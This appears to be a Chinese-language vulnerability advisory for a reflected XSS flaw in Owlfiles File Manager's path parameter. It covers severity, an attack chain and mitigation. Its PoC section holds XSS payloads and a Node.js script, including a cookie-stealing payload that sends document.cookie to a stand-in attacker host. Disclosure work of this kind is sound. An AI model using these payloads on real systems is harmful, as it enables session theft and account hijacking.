CVE-2022-50891 - Owlfiles File Manager跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2022-50891

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Owlfiles File Manager

漏洞概述

CVE-2022-50891是发现于Owlfiles File Manager 12.0.1版本中的一个跨站脚本（XSS）漏洞。该漏洞存在于HTTP服务器端点中，攻击者可以通过path参数注入恶意脚本代码。Owlfiles File Manager是一款运行在iOS平台上的文件管理应用程序，其内置的HTTP服务器功能存在安全缺陷。当用户通过浏览器访问受影响的端点时，攻击者精心构造的恶意URL会被服务器解析并反射到响应页面中，从而在受害者的浏览器上下文中执行任意JavaScript代码。此类漏洞可被用于窃取用户会话cookie、劫持用户账户、执行恶意操作或进行进一步的社会工程攻击。由于该漏洞利用无需特殊权限认证，且需要用户交互触发，因此属于中等严重程度的Web安全漏洞。建议用户及时更新应用程序到最新版本，并避免点击来源不明的链接。

技术细节

该XSS漏洞位于Owlfiles File Manager的HTTP服务器组件中，具体影响download和list两个端点。漏洞的根本原因在于应用程序未对用户输入的path参数进行充分的输入验证和输出编码。当攻击者构造包含恶意JavaScript代码的URL请求时，例如在path参数中嵌入<script>alert(document.cookie)</script>标签，服务器端会直接将此输入反射到HTTP响应中，而未进行任何安全处理。浏览器在解析响应时会将<script>标签内的内容作为JavaScript执行，从而触发XSS攻击。由于HTTP服务器绑定在本地接口（localhost），攻击者需要诱导用户访问恶意构造的链接才能成功利用。此漏洞属于反射型XSS（Reflected XSS），攻击载荷通过URL参数传递，不持久化存储在服务器端。攻击者可利用此漏洞窃取用户的认证令牌、进行钓鱼攻击或在用户上下文执行任意操作。

攻击链分析

STEP 1

步骤1 - 信息收集

攻击者识别目标系统运行Owlfiles File Manager应用，并发现其HTTP服务器端点

STEP 2

步骤2 - 载荷构造

攻击者构造包含恶意JavaScript代码的XSS载荷，如<script>alert(document.cookie)</script>

STEP 3

步骤3 - 社会工程

攻击者通过钓鱼邮件、即时消息或其他方式诱导用户访问构造的恶意URL

STEP 4

步骤4 - 漏洞触发

用户浏览器向Owlfiles HTTP服务器发送请求，path参数包含恶意脚本

STEP 5

步骤5 - 脚本执行

服务器未对输入进行过滤直接将payload反射回响应，浏览器执行注入的JavaScript代码

STEP 6

步骤6 - 恶意操作

攻击者通过执行的脚本窃取用户cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50891 PoC - XSS via path parameter in Owlfiles File Manager
// Target: http://localhost:PORT/download?path=<script>alert('XSS')</script>
// Target: http://localhost:PORT/list?path=<img src=x onerror=alert(document.cookie)>

const http = require('http');

function exploitXSS(targetHost, targetPort, xssPayload) {
    const options = {
        hostname: targetHost,
        port: targetPort,
        path: '/download?path=' + encodeURIComponent(xssPayload),
        method: 'GET'
    };

    const req = http.request(options, (res) => {
        let data = '';
        res.on('data', (chunk) => { data += chunk; });
        res.on('end', () => {
            console.log('Response Status:', res.statusCode);
            console.log('XSS Payload reflected in response:', data.includes(xssPayload));
        });
    });

    req.on('error', (e) => {
        console.error('Request error:', e.message);
    });

    req.end();
}

// Cookie stealing payload
const cookieStealPayload = '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>';
exploitXSS('localhost', 8080, cookieStealPayload);

影响范围

Owlfiles File Manager < 12.0.2

防御指南

临时缓解措施

在官方修复版本发布前，用户应避免通过浏览器访问Owlfiles HTTP服务器的任何端点，特别是点击来源不明的链接。启用浏览器的XSS过滤器功能可以提供一定的防护。此外，关闭HTTP服务器功能或限制其访问权限也能有效降低风险。建议关注官方安全公告，及时应用安全更新。